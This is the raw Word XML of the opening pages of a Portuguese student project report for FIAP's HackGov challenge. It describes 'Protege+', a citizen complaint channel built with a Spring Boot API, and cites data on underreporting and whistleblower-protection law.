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900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Centralizado"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="1655999" cy="193827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mg/protege_logo_branco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999" cy="1938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spacing w:before="240" w:after="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="76"/>
          <w:color w:val="0F2F6B"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="76"/>
          <w:color w:val="43A047"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="76"/>
          <w:color w:val="1565C0"/>
        </w:rPr>
        <w:t>O</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="76"/>
          <w:color w:val="0F2F6B"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="76"/>
          <w:color w:val="F9A825"/>
        </w:rPr>
        <w:t>E</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="76"/>
          <w:color w:val="43A047"/>
        </w:rPr>
        <w:t>G</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="76"/>
          <w:color w:val="1565C0"/>
        </w:rPr>
        <w:t>E</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="76"/>
          <w:color w:val="F9A825"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="30"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Canal Nacional de Denúncias para Proteção do Cidadão</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="14" w:space="6" w:color="1565C0"/>
        </w:pBdr>
        <w:spacing w:before="280" w:after="280"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="44"/>
          <w:color w:val="1565C0"/>
        </w:rPr>
        <w:t>HackGov · Fase 5</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>API RESTful · Estruturas de Dados · Estatística Aplicada · Governança e Auditoria</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:type="dxa" w:w="62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  <w:tblCellMar>
          <w:top w:w="90" w:type="dxa"/>
          <w:left w:w="80" w:type="dxa"/>
          <w:bottom w:w="90" w:type="dxa"/>
          <w:right w:w="80" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2066"/>
        <w:gridCol w:w="2067"/>
        <w:gridCol w:w="2067"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2066"/>
            <w:shd w:val="clear" w:fill="0F2F6B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color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>API RESTful</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2067"/>
            <w:shd w:val="clear" w:fill="F9A825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color w:val="1A1A1A"/>
              </w:rPr>
              <w:t>LGPD</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2067"/>
            <w:shd w:val="clear" w:fill="43A047"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Auditoria</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="1500" w:after="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>Gabriel Vasconcellos Gomes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="50" w:after="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:color w:val="1565C0"/>
        </w:rPr>
        <w:t>RM 561601</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="50" w:after="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>Turma 2SIOA · Enterprise Challenge · Entrega individual</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="1300" w:after="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Vídeo de demonstração (YouTube, não listado): </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
          <w:color w:val="1565C0"/>
        </w:rPr>
        <w:t>https://youtu.be/DoenYynHA6E</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="50" w:after="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Repositório: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
          <w:color w:val="1565C0"/>
        </w:rPr>
        <w:t>github.com/Gabriell230G/hackgovProtegeMais</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="900" w:after="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>FIAP · 2026</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="24" w:name="ficha-técnica-do-documento"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ficha técnica do documento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36"/>
        <w:gridCol w:w="48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Protege+, Canal Nacional de Denúncias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Desafio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HackGov, Enterprise Challenge FIAP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(final)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Gabriel Vasconcellos Gomes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561601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Turma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2SIOA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Natureza da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Individual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https://github.com/Gabriell230G/hackgovProtegeMais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Vídeo (YouTube, não listado)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https://youtu.be/DoenYynHA6E</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, replicado na apresentação e no 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Back-end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 17 · Spring Boot 3.3.4 · Spring Security · JWT · Spring Data JPA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 19c (modelo físico) · PostgreSQL (produção) · H2 (execução local)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HTML5 · CSS3 · JavaScript (27 módulos) · React 18 (CDN) · Chart.js · Leaflet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Documentação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 / Swagger UI em</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/swagger-ui.html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testes JUnit em 11 conjuntos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Volume de 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 classes Java de produção e 11 de teste · 31 endpoints REST · 12 tabelas · 30 restrições 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Base de demonstração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125 denúncias determinísticas (semente 561601) e 201 eventos de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Fontes externas citadas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referências, listadas no Anexo E</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkStart w:id="23" w:name="sobre-a-estrutura-deste-documento"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sobre a estrutura deste documento</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Este documento foi organizado para ser</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">conferido item a item contra o enunciado da Fase 5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Cada uma das cinco Partes abre com um quadro intitulado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que o enunciado pede</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, que reproduz literalmente o requisito correspondente, e cada requisito tem uma seção própria com numeração explícita. O Anexo C consolida essa correspondência numa matriz de conformidade, com a indicação da seção, do arquivo de código e da forma de verificação de cada item.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Quatro princípios guiaram a redação:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Toda decisão de projeto é justificada por uma fonte externa.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">As escolhas defendidas aqui não são preferências de estilo: elas se apoiam em legislação brasileira (LGPD, Lei 13.460/2017, Lei 13.608/2018, Decreto 9.492/2018, Decreto 10.153/2019), em normas técnicas (RFC 9110, RFC 8725, OWASP API Security Top 10, NIST SP 800-92, ISO/IEC 27002), em dados públicos (IPEA, MDHC, CGU, IBM) e em literatura acadêmica (SWEENEY, 2002; ROCHER et al., 2019; TUKEY, 1977). São</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">50 fontes</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, citadas ao longo do texto pelo sistema autor-data e listadas por extenso no</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Anexo E</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, com endereço de acesso.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Toda afirmação técnica aponta para um arquivo.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Quando o texto diz que uma regra existe, ele nomeia a classe, o método ou o script em que ela está escrita. Uma afirmação de projeto que não pode ser localizada no código é uma afirmação que não pode ser verificada.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Todo número apresentado é reproduzível.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">As estatísticas da Parte 4 saem de uma base determinística, gerada a partir da semente 561601. Reexecutar a carga produz exatamente os mesmos 125 registros e, portanto, exatamente as mesmas médias, medianas e desvios impressos aqui. O Anexo B descreve como reproduzi-los em menos de cinco minutos.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Os limites do que foi construído são declarados.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">As seções 5.8 e 6.3 listam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está resolvido. Um documento de segurança que só relata acertos não é um documento de segurança, é material de divulgação.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="23"/>
    <w:bookmarkEnd w:id="24"/>
    <w:bookmarkStart w:id="25" w:name="sumário"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sumário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2"/>
        <w:gridCol w:w="5890"/>
        <w:gridCol w:w="9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Pág.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Introdução: contexto, problema em números e mapa da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1: Versão Atual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 Fase 5 mudou: o panorama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Evolução medida, número a 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Nasce a API: back-end Java em camadas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memória do navegador ao banco relacional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Segurança: de simulada a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VigIA: de heurística local a copiloto com plano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Front-end: vinte módulos novos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viva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 automatizados: de zero a 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Endereçamento das ressalvas das fases anteriores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cronológico das evoluções desta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Síntese da Parte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2: Ajustes no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de revisão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Backlog revisado (US01 a US18)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das reaberturas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 user stories de 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 user stories de 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Novas user stories de manipulação de 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user story de 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Critérios de aceitação das histórias prioritárias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Definição de pronto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Backlog consolidado: quadro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3: Implementação de API RESTful e Integração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(a): a API RESTful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completo das rotas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 de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de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eficiente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Documentação executável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(b): CRUD funcional nos recursos principais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(c): integração da API ao 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interface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mesma denúncia, três respostas diferentes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4: Manipulação Avançada de Dados e Criação de Relatórios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(a): lista, fila de prioridade e pilha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(b): relatórios estatísticos com gráficos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 de tendência central e de dispersão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Gráficos 1 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(c): interpretações e sugestões de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5: Governança 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princípio que organiza tudo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(a): controle de acesso, proteção e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(b): tabelas de perfis, permissões e dados pessoais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(c): quais operações geram trilha de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(d): log técnico e registro de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(e): medidas para reduzir a exposição na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Fundamento legal das decisões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ainda não está resolvido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6. Encerramento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A: O modelo físico, bloco a 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B: Como executar e como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C: Matriz de conformidade com o enunciado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D: Registro de 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E: Referências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</w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="25"/>
    <w:bookmarkStart w:id="30" w:name="introdução"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Introdução</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="26" w:name="contexto-do-desafio"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Contexto do desafio</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">O HackGov é um desafio de construção de uma solução GovTech: sair da modelagem de um problema público e chegar a um sistema que funciona, com banco de dados, back-end, front-end e regras que sobrevivem ao uso real. Esta Fase 5 é a etapa de</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">consolidação técnica</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, em que a solução precisa deixar de ser um conjunto de funcionalidades e passar a ser um sistema que organiza fluxos, expõe suas capacidades por uma API RESTful, integra telas e serviços, consulta dados de forma eficiente, protege dado sensível, registra as ações relevantes e produz informação útil para a gestão pública.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="26"/>
    <w:bookmarkStart w:id="27" w:name="o-problema-público-em-números"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">O problema público, em números</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A solução deste autor é o</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Protege+, Canal Nacional de Denúncias</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: um canal público para registro e acompanhamento de denúncias de violência, abuso e violação de direitos. Antes de descrever o sistema, vale dimensionar o problema com dados de fontes oficiais, porque é deles que decorrem as decisões de projeto defendidas ao longo deste documento.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">O canal federal equivalente opera em escala de centenas de milhares de casos por ano e está crescendo.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">O Disque 100, canal da Ouvidoria Nacional dos Direitos Humanos, registrou</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">657,2 mil denúncias em 2024</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, contra 536,1 mil em 2023, um crescimento de</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">22,6%</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(MDHC, 2025). Um sistema desenhado para esse domínio não pode tratar volume como detalhe: paginação, índices e consulta eficiente deixam de ser refinamento e viram requisito, o que a seção 3.1.8 detalha.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">O que chega ao canal é uma fração do que acontece.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">O IPEA estima</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">822 mil casos de estupro por ano no Brasil</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">e conclui que</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">apenas 8,5% deles chegam ao conhecimento da polícia e 4,2% são identificados pelo sistema de saúde</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(IPEA, 2023). A subnotificação é o problema central deste domínio, e ela é a justificativa direta para as decisões de produto mais importantes do Protege+: anonimato graduado, registro sem conta, fluxo de emergência em três toques e Modo Seguro.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">O medo de retaliação é a causa reconhecida dessa subnotificação.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">A Diretiva (UE) 2019/1937, que estabeleceu o regime europeu de proteção a denunciantes, abre justamente reconhecendo que</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">os potenciais denunciantes são frequentemente desencorajados de comunicar as suas preocupações ou suspeitas por receio de retaliação</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(UNIÃO EUROPEIA, 2019). A Transparência Internacional registra que, mesmo onde há proteção legal, a represália persiste na forma de demissão, rebaixamento, assédio e ataques à reputação (TRANSPARENCY INTERNATIONAL, 2026).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">O direito brasileiro já transformou essa constatação em obrigação.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">A Lei 13.608/2018 assegura que</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">o informante que se identificar terá assegurado, pelo órgão que receber a denúncia, o sigilo dos seus dados</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(art. 3.º) e, na redação dada pela Lei 13.964/2019, garante ao informante a preservação de sua identidade e proteção integral contra retaliações (arts. 4.º-A a 4.º-C) (BRASIL, 2018b). O Decreto 10.153/2019 vai além e define o</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">como</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: a identificação deve ser preservada desde o recebimento, a restrição de acesso é mantida por cem anos e a unidade de ouvidoria deve pseudonimizar a denúncia antes de encaminhá-la (BRASIL, 2019).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A conclusão que organiza todo o resto deste trabalho é esta:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">num canal de denúncias, proteger a identidade não é conformidade, é a funcionalidade principal</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Vazar quem denunciou não gera prejuízo financeiro, gera violência contra a pessoa que confiou no Estado. É por isso que a Parte 5 não é um apêndice deste documento, e sim o eixo do produto.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="27"/>
    <w:bookmarkStart w:id="28" w:name="a-solução-apresentada"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A solução apresentada</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">O lado do cidadão</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">aceita denúncia anônima em três níveis de anonimato, anexo de evidências, consulta por protocolo, botão de emergência com localização e um Modo Seguro que esvazia a tela em um toque.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">O lado do órgão público</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">traz Kanban de atendimento, fila de priorização automática, mapa com agregação por município, relatório estatístico e trilha de auditoria.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">O desenho segue precedentes públicos verificáveis. O Fala.BR, plataforma de ouvidoria do governo federal operada pela CGU, admite registro anônimo de denúncias e declara que</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">em nenhuma hipótese, o Fala.BR coletará o endereço IP do denunciante que registra sua manifestação de forma anônima</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(CGU, [s.d.]a). O Decreto 9.492/2018 determina que comunicações de irregularidade</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ainda que de origem anônima</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">sejam enviadas para apuração (art. 23, §2.º) (BRASIL, 2018c). O anonimato do Protege+, portanto, não é uma liberalidade do produto: é o padrão da administração pública federal.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="28"/>
    <w:bookmarkStart w:id="29" w:name="X145ceaa0b045e59a70be958385ef502f03f16e7"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Como esta entrega responde ao que foi pedido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 que a Fase 5 pede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está neste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1:</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">relatar as evoluções desde a última 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1, seções 1.1 a 1.12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2:</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">reavaliar o Product Backlog, novas user stories de front-end, segurança e manipulação de arquivos, critérios de aceitação das prioritárias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2, seções 2.1 a 2.10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3:</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">implementar e documentar API RESTful robusta; CRUD funcionando; integração ao front-end com consumo dos endpoints via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3, seções 3.1, 3.2 e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4:</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">estruturas de dados avançadas; relatórios estatísticos; cálculos, interpretações e sugestões para o negócio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4, seções 4.1, 4.2 e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Parte 5:</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">controle de acesso, proteção e registro; tabela de perfis e permissões; operações que geram trilha; log técnico contra auditoria; medidas contra exposição por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5, seções 5.2 a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Organizar solicitações e fluxos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Kanban, fila de prioridade e pilha de desfazer, seções 4.1.2 e 4.1.3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dados de forma eficiente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3.1.8, com paginação e filtros resolvidos no banco e 13 índices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Produzir informação útil para a gestão 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4, com seis gráficos e oito recomendações de negócio</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="29"/>
    <w:bookmarkEnd w:id="30"/>
    <w:bookmarkStart w:id="43" w:name="parte-1-versão-atual-do-projeto"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">PARTE 1: Versão Atual do Projeto</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
